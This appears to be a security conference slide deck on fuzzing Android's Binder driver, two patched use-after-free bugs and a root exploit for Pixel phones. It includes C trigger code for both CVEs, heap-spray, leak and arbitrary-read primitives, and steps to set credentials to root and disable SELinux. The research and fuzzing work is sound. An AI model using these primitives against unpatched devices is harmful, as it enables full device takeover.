
How to Fuzz Your Way to Android Universal Root:
Attacking Android Binder

Eugene Rodionov, Zi Fan Tan, Gulshan Singh
10-May-2024
Agenda

● Introduction to Android Binder
● CVE-2023-20938 & CVE-2023-21255 UAF Details
● Exploitation of CVE-2023-20938
● Fuzzing Binder with LKL
● Conclusion
Introduction

Who we are

Increase Android security by attacking key components and features, identifying
critical vulnerabilities before adversaries do

● Offensive Security Reviews to verify (break) security assumptions
● Scale through tool development (e.g. continuous fuzzing)
● Develop proofs of concept to demonstrate real-world impact
● Assess the efficacy of security mitigations
Binder Overview

What is Binder?

● The primary inter-process communication (IPC) channel on Android
● Supports passing file descriptors, objects containing pointers, etc.
● Composed of a userspace library (libbinder) and a kernel driver (/dev/binder)
● Provides a Remote Procedure Call (RPC) framework for Java and C/C++
Why Binder?

● High vulnerability density per thousand lines of code
  ○ ~7k lines of C code (3 vulns / 1K lines)
● Wide attack surface
  ○ Accessible by all untrusted apps
  ○ Historically, exploited from Chrome for sandbox escapes
● Recently exploited for root privilege escalation
  ○ Waterdrop (2019), Bad Binder (2019), CVE-2020-0041 (2020), Typhoon Mangkhut (2020), Bad Spin (2022)
● Complex object lifetimes, memory management, and a highly complex multithreading model
  ○ 5 different locks, 6 reference counters, as well as atomic variables
  ○ Our initial assumption was that data races would be the primary cause of vulnerabilities, but refcount bugs were more prevalent
Binder Threat Model

[Diagram] Untrusted apps exchange RPCs with system services (and system
services with each other) through libbinder, the Binder userspace library.
Every endpoint ultimately talks to the kernel driver /dev/binder via ioctl,
so the driver is directly reachable from fully untrusted code.
Binding IPC Endpoints: Workflow

[Diagram] Process A (MyService) and Process B (IMyService):
1. Process A sends a Node of MyService to Process B (ioctl to /dev/binder)
2. The Binder driver creates a Node (0xbeef), refcount 0 -> 1
3. The Binder driver creates a Ref (0xbeef) in Process B
4. Process B performs RPC calls: MyService.myMethod(args)
Binder Context Manager

How does Binder know where to send the Node 0xbeef?

● The Context Manager is a special Binder IPC endpoint always accessible at handle 0
● In Android, the ServiceManager process serves as the Binder Context Manager
● Android components register their Binder Nodes with the ServiceManager to be
  discoverable by other endpoints
Binder Transactions

● Accessible via the BINDER_WRITE_READ ioctl, which takes a struct binder_write_read:
  write_size/write_buffer (commands such as BC_TRANSACTION followed by a
  struct binder_transaction_data) and read_size/read_buffer (returned work)
● A struct binder_transaction_data names the recipient (target.handle = 0 for the
  Context Manager) and carries a data buffer plus an offsets array; each offset
  points at a Binder object embedded in the buffer (e.g. a struct flat_binder_object
  at offset 0, a struct binder_fd_object at offset 8)
● Transfer Binder objects between the IPC endpoints:
  ○ Binder Node
  ○ Binder Ref
  ○ Linux file descriptor
  ○ Binder buffer pointers
● Binder objects are "translated" from the sender's context into the recipient's context

Binder Objects

struct flat_binder_object            struct binder_fd_object
    type = BINDER_TYPE_BINDER            type = BINDER_TYPE_FD
    binder = 0xbeef                      fd = 123
    ...                                  ...
    (a Binder Node)                      (a File Descriptor)
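To make these layouts concrete, here is a minimal userspace sketch of a one-object
transaction (our illustration, not code from the talk). It assumes the UAPI header
<linux/android/binder.h> and a binder fd that has already been opened and mmap'ed:

/* Minimal sketch: one BC_TRANSACTION carrying a flat_binder_object. */
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/android/binder.h>

int send_node(int binder_fd, uint32_t target_handle) {
    struct flat_binder_object obj = {
        .hdr.type = BINDER_TYPE_BINDER,
        .binder   = 0xbeef,            /* userspace value naming our Node */
    };
    binder_size_t offsets[1] = { 0 };  /* obj sits at offset 0 of the buffer */

    struct binder_transaction_data tr = {
        .target.handle    = target_handle,    /* 0 == Context Manager */
        .data_size        = sizeof(obj),
        .offsets_size     = sizeof(offsets),  /* must be 8-byte aligned! */
        .data.ptr.buffer  = (binder_uintptr_t)(uintptr_t)&obj,
        .data.ptr.offsets = (binder_uintptr_t)(uintptr_t)offsets,
    };

    /* write_buffer = BC_TRANSACTION command followed by its payload */
    uint8_t wbuf[sizeof(uint32_t) + sizeof(tr)];
    *(uint32_t *)wbuf = BC_TRANSACTION;
    memcpy(wbuf + sizeof(uint32_t), &tr, sizeof(tr));

    struct binder_write_read bwr = {
        .write_size   = sizeof(wbuf),
        .write_buffer = (binder_uintptr_t)(uintptr_t)wbuf,
    };
    return ioctl(binder_fd, BINDER_WRITE_READ, &bwr);
}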


Vulnerabilities
CVE-2023-20938 & CVE-2023-21255

Vulnerability Description (1)
● When sending a transaction, Binder translates objects to another form
○ Translate a Binder Node to a Binder Ref or vice versa
○ Install new file descriptors in another process for file sharing

binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// ...
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (2)
● If an error occurs in the loop, all objects translated so far must be cleaned up
● The cleanup function is passed the buffer offset the loop has reached, with
is_failure set to true
binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (3)
● What happens if an error happens before any objects are processed?

binder_size_t buffer_offset = 0;
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
goto err_bad_offset;
}
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
buffer_offset += sizeof(binder_size_t)) {
// if error: goto err_bad_offset
}
err_bad_offset:
binder_transaction_buffer_release(target_proc, NULL, t->buffer,
buffer_offset, /*is_failure*/true);
Vulnerability Description (4)
● There are cases where a buffer offset of zero is passed to this function with
is_failure set to true, to indicate that the entire buffer needs to be cleaned up

void binder_transaction_buffer_release(binder_proc *target_proc, binder_buffer *buffer,
                                       size_t failed_at /*buffer_offset*/, bool is_failure) {
    off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
    off_end_offset = is_failure && failed_at /*0*/ ? failed_at
                                                   : off_start_offset + buffer->offsets_size;
    for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
         buffer_offset += sizeof(size_t)) {
        // ...
        case BINDER_TYPE_BINDER: {
            flat_binder_object *fp = to_flat_binder_object(hdr);
            binder_node *node = binder_get_node(target_proc, fp->binder);
            binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0);
            binder_put_node(node);
        }
    }
}

● With failed_at == 0 the ternary falls through to off_start_offset +
buffer->offsets_size, so the release loop walks the whole offsets range and
decrements reference counters for objects that were never translated
Vulnerability Overview

[Flowchart: binder_transaction]
1. Start binder_transaction
2. Copy all transaction objects from the user-space buffer into the kernel buffer
3. Validate the transaction; if invalid, take the error path (step 6)
4. Get the next transaction object in the kernel buffer and validate it; if valid,
   translate Ref to Node (side effect: increment Node reference counters)
5. More objects? If yes, repeat step 4; if no, finish binder_transaction
6. Vulnerable path: on any failure, "untranslate" all objects and roll back state
   (side effect: decrement Node reference counters)
Vulnerability Explained (Initial State)

[Diagram] Thread A owns MyService, backed in the kernel by Node 0xbeef with
Refcount 2; Thread B holds Ref 0xbeef (IMyService). A pending transaction
addressed "To: Node 0xbeef" sits in Thread A's state.
Vulnerability Explained (Normal Workflow)

[Diagram] Thread B sends a transaction to Thread A's Node via its Ref 0xbeef
(ioctl). The driver translates the Ref into Node 0xbeef and, as a side effect,
increments the refcount: 2 -> 3.
Vulnerability Explained (Attacker Workflow)

[Diagram] Thread B instead sends a Node object (not a Ref) for 0xbeef, with an
unaligned offsets_size. The driver takes the error path (goto err_bad_offset)
before any translation occurs, yet the cleanup still "rolls back" the
untranslated Node: the refcount drops 2 -> 1, one below its true value.
Vulnerability Explained (Attacker Workflow, continued)

[Diagram] Thread B is killed, dropping its legitimate reference: the refcount
falls 1 -> 0 and Node 0xbeef is freed, even though Thread A's pending
transaction still points to it. When Thread A later issues an ioctl to read
the pending transaction, a use-after-free occurs.
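Concretely, the attacker transaction can be built as below — a hedged sketch
assuming a pre-patch kernel; victim_handle and the node value 0xbeef are
illustrative and must correspond to a real node owned by the target process:

/* Hedged sketch of the CVE-2023-20938 trigger. */
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/android/binder.h>

void trigger_20938(int binder_fd, uint32_t victim_handle) {
    struct flat_binder_object obj = {
        .hdr.type = BINDER_TYPE_BINDER,
        .binder   = 0xbeef,       /* matches the victim's Node 0xbeef */
    };
    binder_size_t offsets[1] = { 0 };

    struct binder_transaction_data tr = {
        .target.handle    = victim_handle,
        .data_size        = sizeof(obj),
        .offsets_size     = 4,    /* NOT a multiple of 8: IS_ALIGNED fails */
        .data.ptr.buffer  = (binder_uintptr_t)(uintptr_t)&obj,
        .data.ptr.offsets = (binder_uintptr_t)(uintptr_t)offsets,
    };

    uint8_t wbuf[sizeof(uint32_t) + sizeof(tr)];
    *(uint32_t *)wbuf = BC_TRANSACTION;
    memcpy(wbuf + sizeof(uint32_t), &tr, sizeof(tr));

    struct binder_write_read bwr = {
        .write_size   = sizeof(wbuf),
        .write_buffer = (binder_uintptr_t)(uintptr_t)wbuf,
    };
    /* Pre-patch kernels copy the whole buffer, hit err_bad_offset, and the
     * cleanup "rolls back" the never-translated node: refcount 2 -> 1. */
    ioctl(binder_fd, BINDER_WRITE_READ, &bwr);
}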
CVE-2023-20938 Remediation

● CVE-2023-20938 was identified via fuzzing on the android13-5.10 kernel
● The test case wasn't reproducible on the android13-5.15 ACK due to this patch[1]
● Before the patch, all binder transaction objects are copied from user space into
the binder kernel buffer before translating the objects:

-   if (binder_alloc_copy_user_to_buffer(
-           &target_proc->alloc,
-           t->buffer, 0,
-           (const void __user *)(uintptr_t)tr->data.ptr.buffer,
-           tr->data_size)) {

● After the patch, binder transaction objects are copied from user space into the
binder kernel buffer during translation, as each object is processed:

    // ...
    for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
         buffer_offset += sizeof(binder_size_t)) {
+       if (copy_size && (user_offset > object_offset ||
+               binder_alloc_copy_user_to_buffer(
+                   &target_proc->alloc,
+                   t->buffer, user_offset,
+                   user_buffer + user_offset,
+                   copy_size))) {
        // translate binder object
    }

● CVE-2023-20938 was fixed by back-porting the patch to the vulnerable kernels in
the 2023-02-01 ASB[2]:
  ○ android13-5.10
  ○ android12-5.4

[1] https://github.com/torvalds/linux/commit/6d98eb95b450a75adb4516a1d33652dc78d2b20c
[2] https://source.android.com/docs/security/bulletin/2023-02-01#kernel
Before the patch vs. after the patch: binder_transaction

[Flowchart, before] Copy all transaction objects from the user-space buffer into
the kernel buffer -> validate the transaction -> for each object: validate it,
then translate Ref to Node -> on any failure, "untranslate" all objects & roll
back state (the vulnerable path).

[Flowchart, after] Validate the transaction -> for each object: validate it,
copy the object into the kernel buffer, then translate Ref to Node -> on any
failure, "untranslate" all objects & roll back state. Is the rollback still a
vulnerable path?
Discovery of CVE-2023-21255

● The binder kernel buffer isn't zeroed between ioctls
● Any data from previously processed transactions remains in the buffer
  ○ … and gets processed by binder_transaction_buffer_release on the error path!

● The fuzzer identified another test case triggering the same UAF issue
  ○ Send a valid transaction with a binder node to pollute the binder kernel buffer
  ○ Send a malformed transaction with misaligned offsets to trigger the error path
    ■ binder_transaction_buffer_release rolls back the binder node translation from
      the previous step => UAF

● CVE-2023-21255 was fixed in the 2023-07-01 ASB[1]

[1] https://source.android.com/docs/security/bulletin/2023-07-01#kernel
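A sketch of this two-transaction trigger; send_transaction() is a hypothetical
helper assumed to pack BC_TRANSACTION exactly as in the earlier sketches,
parameterized here by offsets_size:

/* Hedged sketch of the CVE-2023-21255 trigger. */
void trigger_21255(int binder_fd, uint32_t victim_handle) {
    /* 1. Valid transaction with a BINDER_TYPE_BINDER object: once the
     *    recipient frees it, its bytes linger in the recycled kernel
     *    buffer (the buffer is not zeroed between ioctls). */
    send_transaction(binder_fd, victim_handle, /*offsets_size=*/8);

    /* 2. Malformed transaction reusing that buffer: the misaligned
     *    offsets_size hits the error path before anything is copied, and
     *    binder_transaction_buffer_release walks the stale offsets,
     *    rolling back step 1's translation a second time => UAF. */
    send_transaction(binder_fd, victim_handle, /*offsets_size=*/4);
}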
Exploitation

Exploitation Steps

1. Leak Primitive[1]: exploit the vulnerability to create a dangling pointer to a
binder_node; allocate a kernel object overlaying the freed binder_node; leak
values from that kernel object (UaF)
2. Unlink Primitive[1]: exploit the vulnerability again to create a dangling
pointer to a binder_node; allocate a fake binder_node overlaying the freed one;
obtain an arbitrary write when unlinking (UaF)
3. Arbitrary Read[1]: leak a pointer to a struct file; overwrite the inode
pointer field in struct file; bypass KASLR
4. Root: locate struct task_struct & struct cred; overwrite all user and group
IDs with 0; disable SELinux

[1] https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
Leak Primitive

static int binder_thread_read(...)
    struct binder_transaction_data_secctx tr;
    struct binder_transaction_data *trd = &tr.transaction_data;
    ...
    trd->target.ptr = target_node->ptr;     [1]
    trd->cookie = target_node->cookie;      [1]
    ...
    if (copy_to_user(ptr, &tr, trsize)) {   [2]

[Diagram] When Thread A reads its pending transaction, the kernel copies
target_node->ptr (offset 88 of the dangling binder_node) and
target_node->cookie (offset 96) into trd.target.ptr and trd.cookie [1], then
copy_to_user hands both values to userspace [2].
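A sketch of the read-back side, assuming BR_TRANSACTION delivery (kernels with
secctx support deliver BR_TRANSACTION_SEC_CTX instead, handled analogously);
the command-parsing loop is simplified:

/* Hedged sketch: harvesting the leak on Thread A. */
#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/android/binder.h>

void read_leak(int binder_fd, uint64_t *leak88, uint64_t *leak96) {
    uint8_t rbuf[256];
    struct binder_write_read bwr = {
        .read_size   = sizeof(rbuf),
        .read_buffer = (binder_uintptr_t)(uintptr_t)rbuf,
    };
    ioctl(binder_fd, BINDER_WRITE_READ, &bwr);

    uint8_t *p = rbuf;
    while (p < rbuf + bwr.read_consumed) {
        uint32_t cmd = *(uint32_t *)p;
        p += sizeof(uint32_t);
        if (cmd == BR_TRANSACTION) {
            struct binder_transaction_data *trd = (void *)p;
            *leak88 = trd->target.ptr;   /* == node->ptr    (offset 88) */
            *leak96 = trd->cookie;       /* == node->cookie (offset 96) */
            return;
        }
        p += _IOC_SIZE(cmd);             /* skip this command's payload */
    }
}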
Leak Primitive

1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of that kernel object (at offsets 88 and 96)

[Diagram] The dangling pointer still refers to the freed binder_node's memory.
After a struct epitem is allocated from the same memory, its linked-list
pointers (struct list_head *next at offset 88, *prev at offset 96) sit exactly
where uintptr_t ptr and uintptr_t cookie used to be, so the leak primitive
returns two kernel pointers.
Leak Primitive
How can we overlay another kernel object (epitem) onto the freed binder_node?
● Much easier in userspace (e.g. glibc)
  ○ malloc uses the same freelist regardless of object types
● The Linux kernel is more complicated: SLUB allocator
  ○ Different object types can be allocated from different caches
● Many mitigations enabled in recent years
  ○ CONFIG_SLAB_FREELIST_HARDENED
  ○ CONFIG_SLAB_FREELIST_RANDOM
  ○ GFP_KERNEL_ACCOUNT*
  ○ No more cache aliasing for `epitem` (SLAB_ACCOUNT)
  ○ No unprivileged userfaultfd (for heap spraying)

* Removed in 5.9 and added back in 5.14 (we're targeting 5.10)
Cross-cache Attack (SLUB Allocator)

[Diagram] The SLUB allocator carves objects out of per-type kmem_caches — e.g.
kmalloc-128 (where binder_node lives) and eventpoll_epi (where epitem lives) —
each with a per-CPU active slab and partial slabs. Every slab is backed by
pages obtained from the page (buddy) allocator through a per-CPU page cache,
and empty slabs are returned there, so physical memory can migrate between
caches:

1. Spray 1000+ binder_nodes from the kmalloc-128 cache and use the
vulnerability to turn them into dangling nodes (freed while still referenced)
2. Once every object in a slab has been freed, the empty slab pages are
released back to the page allocator
3. Spray struct epitem allocations; the eventpoll_epi cache requests fresh
pages, receives the recycled ones, and an epitem lands exactly at a dangling
node's address
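A minimal sketch of step 3, the epitem spray; the counts and the
dup()-per-watch trick are our assumptions, not the talk's exact code. Each
EPOLL_CTL_ADD allocates one struct epitem from the eventpoll_epi cache:

/* Hedged sketch of the epitem spray. */
#include <sys/epoll.h>
#include <unistd.h>

#define N_EPFDS 64
#define N_ITEMS 256   /* epitems per epoll instance (assumption) */

void spray_epitems(int target_fd) {
    for (int i = 0; i < N_EPFDS; i++) {
        int epfd = epoll_create1(0);
        for (int j = 0; j < N_ITEMS; j++) {
            /* event.data is attacker-controlled and stored inside epitem */
            struct epoll_event ev = { .events = EPOLLIN,
                                      .data.u64 = 0x4141414141414141 };
            /* epoll keys watches by (file, fd), so dup() the target to add
             * the same file many times; fds are intentionally leaked to
             * keep the epitems alive */
            int fd = dup(target_fd);
            epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
        }
    }
}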
VIDEO DEMONSTRATION OF CROSS-CACHE ATTACK

https://youtu.be/VJWEUsTDtuc
Arbitrary Read

Use the Leak Primitive to leak a pointer to a struct file

[Diagram] The overlaid epitem's *next/*prev pointers (offsets 88 and 96) link
it into the list of epitems watching the same file; since that list is
anchored in the struct file itself, the leaked values point into a struct
file (or a neighboring epitem).

ioctl(fd, FIGETBSZ, &value); // &value == argp

static int do_vfs_ioctl(struct file *filp, ...) {
    ...
    struct inode *inode = file_inode(filp)
    ...
    case FIGETBSZ:
        ...
        return put_user(inode->i_sb->s_blocksize, (int __user *)argp);

[Diagram] FIGETBSZ follows the file's inode pointer, then i_sb (40 bytes into
struct inode), and put_user()s s_blocksize (24 bytes into struct super_block)
back to userspace. Overlaying a struct epitem on the struct file places
event.data — which can be modified directly with the epoll_ctl() syscall —
over the file's inode pointer field, so the whole dereference chain becomes
attacker-controlled and FIGETBSZ turns into an arbitrary read.
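A schematic wrapper for the resulting primitive, valid only under the overlap
assumption shown in the diagram (epitem.event.data sits over the target file's
inode pointer); the fd roles and offsets are illustrative:

/* Hedged sketch of the arbitrary read. fake_inode must point at memory
 * where a fake inode lives: *(fake_inode + 40) -> fake super_block, whose
 * field at offset 24 (s_blocksize) is what FIGETBSZ copies back to us. */
#include <stdint.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <linux/fs.h>   /* FIGETBSZ */

int arb_read32(int epfd, int watched_fd, int target_fd, uint64_t fake_inode) {
    /* EPOLL_CTL_MOD rewrites event.data, i.e. the overlapped inode ptr */
    struct epoll_event ev = { .events = EPOLLIN, .data.u64 = fake_inode };
    epoll_ctl(epfd, EPOLL_CTL_MOD, watched_fd, &ev);

    int value = 0;
    ioctl(target_fd, FIGETBSZ, &value);  /* fake_inode->i_sb->s_blocksize */
    return value;
}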
Unlink primitive

1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with the sendmsg() syscall (heap spray).

[Diagram] The heap spray places attacker-controlled data (a fake binder_node
with chosen ptr and cookie fields) at the freed binder_node's address, still
reachable through the dangling pointer.
Unlink primitive
● Use-after-free when decrementing the refcount of a binder_node

static bool binder_dec_node_nilocked(struct binder_node *node, ...) {
    ...
    // If the binder_node's refcount reaches 0
    // and all checks are satisfied
    ...
    hlist_del(&node->dead_node);   // *pprev = next; *(next + 8) = pprev
    ...
}

With node->dead_node fully attacker-controlled, these two unlink writes
become an arbitrary write primitive.
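A hedged sketch of the sendmsg() spray used for step 2 (sizes and names are
illustrative). The kernel copies msg_control into a kmalloc'd buffer of
msg_controllen bytes, so a 128-byte control block lands in kmalloc-128, the
cache the freed binder_node came from. Two known constraints: the first bytes
of the payload are the cmsg header, and the allocation is freed when
sendmsg() returns, so the real exploit makes the call block (e.g. on a full
socket buffer) to keep it alive while the dangling node is used:

/* Hedged sketch of the fake-node spray. */
#include <string.h>
#include <sys/socket.h>

void spray_fake_node(const void *fake_node, size_t len /* 128 */) {
    int sv[2];
    socketpair(AF_UNIX, SOCK_DGRAM, 0, sv);

    char cbuf[128];
    memcpy(cbuf, fake_node, len);            /* controlled bytes */
    struct cmsghdr *cmsg = (struct cmsghdr *)cbuf;
    cmsg->cmsg_len = len;                    /* keep the header plausible */

    struct msghdr msg = {
        .msg_control    = cbuf,
        .msg_controllen = len,               /* => in-kernel kmalloc(128) */
    };
    sendmsg(sv[0], &msg, 0);
}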
Root Privilege Escalation

1. Obtain the address of struct cred by walking the chain:
   binder_node -> proc -> binder_proc -> task -> task_struct -> cred -> struct cred
2. Set all uids & gids to 0 (kuid_t uid, kgid_t gid, suid, sgid, euid, egid,
   fsuid, fsgid)
3. Set selinux_state.enforcing to 0 to disable SELinux
4. Deal with seccomp and Linux capabilities (not covered)
Demo
Root privilege escalation on Pixel 6 & Pixel 7

VIDEO DEMONSTRATION OF FULL EXPLOIT ON
PIXEL 6 PRO & PIXEL 7 PRO

https://youtu.be/7qFb6RUHnnU
Fuzzing Binder
with Linux Kernel Library (LKL)

Binder Fuzzing

● Syzkaller has been fuzzing Binder for years
  ○ Generates programs based on syscall descriptions to be executed on the target machine
  ○ Discovered CVE-2019-2215 (Bad Binder)
  ○ ~25% line coverage
● Challenges
  ○ Data dependencies
  ○ State dependencies
  ○ Multi-process coordination
  ○ Reproducing and catching issues involving race conditions
Binder Fuzzing Challenges

Data dependencies
● Binder commands
● Scatter-gather data structures (BINDER_TYPE_PTR)

struct object {
    char *x_ptr;
    char *y_ptr;
};

[Diagram] An object holding pointers (x_ptr, y_ptr) is scattered across
several struct binder_buffer_object entries (one for the object itself, one
each for the x and y buffers) and gathered back on the receiving side.

State dependencies
● Synchronous IPC calls between clients
  ○ Cannot send a transaction to oneself
  ○ Multiple outstanding transactions are not allowed
Binder Fuzzing Challenges

State dependencies
● Some inputs depend on previous ioctl calls
  ○ e.g. freeing transaction buffers (BC_FREE_BUFFER) requires an address in the
    Binder memory map returned by an earlier call:

ioctl(binder_fd, BINDER_WRITE_READ, x) // 1.
// y = x->read_buffer->...->buffer
ioctl(binder_fd, BC_FREE_BUFFER, y)    // 2.

Multi-process coordination
● All communication requires a Context Manager
● Node & Ref setup is required to establish a connection
  1. A client sends a Node to the Context Manager
  2. Another client requests a Ref from the Context Manager
  3. Connection established between the two clients
LKL Overview

Linux Kernel Library (LKL)[1] builds the Linux kernel as a user-space library

● Implemented as a Linux arch port (the LKL arch), comparable to UML
● LKL building blocks:
  ○ Host environment API — the portability layer (POSIX, Win32)
  ○ Linux kernel code (generic VFS, NET, Binder, ...)
  ○ LKL syscall API exposed to the user-space application
● The LKL application links the kernel, shares memory and threads with it, and
  runs on any host kernel (Linux, Android, Windows)

Run kernel code without launching a VM
● Kernel unit testing
● Fuzzing![2][3]

[1] https://github.com/lkl/linux
[2] Xu et al., Fuzzing File Systems via Two-Dimensional Input Space Exploration
[3] https://github.com/atrosinenko/kbdysch
Anatomy of LKL fuzzer

LKL enables fuzzing Linux kernel code in user-space
● Use an in-process fuzzing engine, such as libFuzzer
● Everything lives in one GNU/Linux x86_64 user-space process: the
  libFuzzer-based Binder fuzzing harness, the Linux kernel built with KASan
  (fuzzing coverage & crash detection), and a scheduler driven by the fuzz
  data (see Randomized Scheduler below)

Advantages
● High fuzzing performance on x86_64
● Ease of custom modifications
  ○ e.g. mocking hardware, custom device drivers

Limitations
● No SMP in LKL
● x86_64 vs aarch64 — potential false positives, false negatives
Using LKL from your C program

int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");

lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");

int binder_fd = lkl_sys_open("/dev/binder", O_RDWR | O_CLOEXEC, 0);

void *binder_map = lkl_sys_mmap(NULL, BINDER_VM_SIZE,
                                PROT_READ, MAP_PRIVATE, binder_fd, 0);

struct lkl_binder_version version = { 0 };
ret = lkl_sys_ioctl(binder_fd, LKL_BINDER_VERSION, &version);
Fuzzing harness

● Simulate IPC interactions between multiple clients
● 3 clients (1 Context Manager), all running on the Linux Kernel Library
  ○ The fuzz data (below) encodes each client's ioctl calls and data; how the
    harness plugs into libFuzzer is sketched after this slide

Fuzz data:

client_1 {
  binder_write {
    binder_commands {
      transaction {
        binder_objects { binder { ptr: 0xbeef } }
      }
    }
  }
}
client_2 {
  binder_read { ... }
  binder_write {
    binder_commands { free_buffer { ... } }
  }
}
client_3 { ... }
client_2 { ... }
client_3 { ... }
client_1 { ... }
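A hedged sketch of the libFuzzer entry points for such a harness; the helpers
(setup_clients, parse_fuzz_program, run_clients, reset_binder_state, struct
fuzz_program) are hypothetical stand-ins for the real harness internals:

/* Hedged sketch: libFuzzer harness skeleton on top of LKL. */
#include <stddef.h>
#include <stdint.h>
#include <lkl.h>        /* from the LKL tree */
#include <lkl_host.h>

struct fuzz_program;                         /* parsed per-client actions */
extern void setup_clients(void);             /* context manager + 2 clients */
extern int  parse_fuzz_program(const uint8_t *data, size_t size,
                               struct fuzz_program **prog);
extern void run_clients(struct fuzz_program *prog);   /* replay the ioctls */
extern void reset_binder_state(void);        /* per-run cleanup */

int LLVMFuzzerInitialize(int *argc, char ***argv) {
    /* Boot the in-process LKL kernel exactly once per fuzzing process. */
    lkl_start_kernel(&lkl_host_ops, "mem=50M");
    setup_clients();
    return 0;
}

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    struct fuzz_program *prog;
    if (parse_fuzz_program(data, size, &prog) != 0)
        return 0;                            /* reject unparsable inputs */
    run_clients(prog);                       /* drive the 3 clients */
    reset_binder_state();
    return 0;
}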

Randomized Scheduler

Deterministically simulate thread interleaving based on fuzz data[1]

● Insert yield points before/after synchronization primitives
  ○ spin_lock, spin_unlock
  ○ mutex_lock, mutex_unlock
● At every yield point the randomized scheduler consumes fuzz data to decide
  which client thread to schedule next

[1] Williamson, N., Catch Me If You Can: Deterministic Discovery of Race
Conditions with Fuzzing. Black Hat USA, (2022).
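A hedged sketch of the yield-point idea (our illustration, not the talk's
code; switch_to_client_thread, real_spin_lock, etc. are hypothetical names).
Each wrapped primitive consumes one byte of fuzz data to pick the next
runnable client thread, making interleavings deterministic per input:

/* Hedged sketch: fuzz-data-driven yield points around lock primitives. */
#include <stddef.h>
#include <stdint.h>

extern void switch_to_client_thread(int idx);  /* hypothetical host switch */
extern void real_spin_lock(void *l);           /* hypothetical originals */
extern void real_spin_unlock(void *l);

static const uint8_t *sched_data;   /* slice of the fuzzer input */
static size_t sched_len, sched_pos;
static int num_client_threads;

static void fuzz_yield(void) {
    if (sched_pos >= sched_len)
        return;                     /* out of bytes: no forced switch */
    int next = sched_data[sched_pos++] % num_client_threads;
    switch_to_client_thread(next);
}

#define spin_lock(l)   do { fuzz_yield(); real_spin_lock(l);   fuzz_yield(); } while (0)
#define spin_unlock(l) do { fuzz_yield(); real_spin_unlock(l); fuzz_yield(); } while (0)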
Results

● Achieved 68% line coverage
● Discovered CVE-2023-20938 & CVE-2023-21255
Future work

● Upstream the Binder fuzzer to github.com/lkl/linux
● Explore ways to feed thread-interleaving information into the fuzzing engine
● Improve Syzkaller's Binder code coverage by tackling the challenges above
Tools

linux-exploit-dev-env
● gsingh93/linux-exploit-dev-env
● Environment for exploit development on Linux and the Android Common Kernel
● QEMU-based - supports x86_64 and arm64

pwndbg: slab, pcp, binder plugins
● slab - inspect SLAB allocator state
● pcp - inspect the per-cpu page cache (pwndbg/pull/1487)
● binder - inspect Binder state: nodes, refs, transactions, etc. (pwndbg/pull/1488)

bpftrace scripts
● Trace SLAB and page allocations for heap grooming and cross-cache attacks
● Keep an eye on https://github.com/androidoffsec for a future release
Thank You! Questions?
[email protected]
